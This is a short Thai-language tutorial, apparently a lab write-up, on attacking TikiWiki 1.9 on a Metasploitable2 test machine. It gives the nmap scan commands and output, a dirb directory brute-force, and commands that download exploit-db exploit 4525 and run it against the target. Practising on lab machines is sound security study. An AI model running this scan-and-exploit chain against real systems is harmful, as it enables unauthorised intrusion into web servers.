บทนำ (Overview)
บทความนี้กล่าวถึงการค้นหาช่องโหว่และวิธีการยึดช่องโหว่ของเว็บไซต์ “Tikiwiki” โดยเริ่มจากการพยายามหา “port” บริการที่เปิด “port” หมายเลข “80” จากนั้นเริ่มค้น “directory” ที่หน้าจะเกี่ยวข้องกับเว็บไซต์นั้น ๆ เพื่อหา “version” ที่เป็นไปได้ ต่อมาเมื่อทราบ “version” ก็จะหาช่องโหว่ที่เกี่ยวข้อง และหาเครื่องมือสำหรับยึดช่องโหว่นั้น ๆ
ขั้นตอน (Steps)
- ค้นหา “Port” ที่เปิดบริการโดยใช้คำสั่งดังนี้
nmap -p 1-65535 -T4 -A -v 192.168.1.36
- ตรวจสอบ “Port” ที่เปิดบริการ “Web” ทั้ง “80” และ “443”
80/tcp open http Apache httpd 2.2.8 ((Ubuntu) DAV/2) | http-methods: |_ Supported Methods: GET HEAD POST OPTIONS |_http-server-header: Apache/2.2.8 (Ubuntu) DAV/2 |_http-title: Metasploitable2 - Linux
- ทดลองเข้าถึงหน้าเว็บไซต์ แล้วตรวจสอบว่าสามารถพบชื่อ “Web application” หรือ Version อะไรเพิ่มหรือไม่
- ทดลองใช้ “Dir-buster” เพื่อตรวจสอบ “Path” อื่น ๆ เพื่มเติม
#เราใช้ option -r โดยไม่ต้องหา sub directory dirb http://192.168.1.36 /usr/share/wordlists/dirb/big.txt -r
- จากตัวอย่างทดลองเข้า path ที่เจอ http://192.168.1.36/tikiwiki/
- จากรูปข้างเป็นปัญหา TIKIWIKI ไม่สามารถเชื่อมต่อฐานข้อมูล ให้ตั้งค่าตามบทความ How to set Tikiwiki – Metasploitable2
- เมื่อได้ “version” แล้วทดลองค้นช่องโหว่โดยใช้คำค้นดังนี้
search exploit tikiwiki 1.9
- ทดลองดาวน์โหลด “Exploit” ดังนี้
cd /root/Desktop wget --no-check-certificate http://www.exploit-db.com/download/4525 -O exploit-4525.pl
- ใช้งาน “exploit” ดังนี้
perl exploit-4525.pl http://192.168.1.36/tikiwiki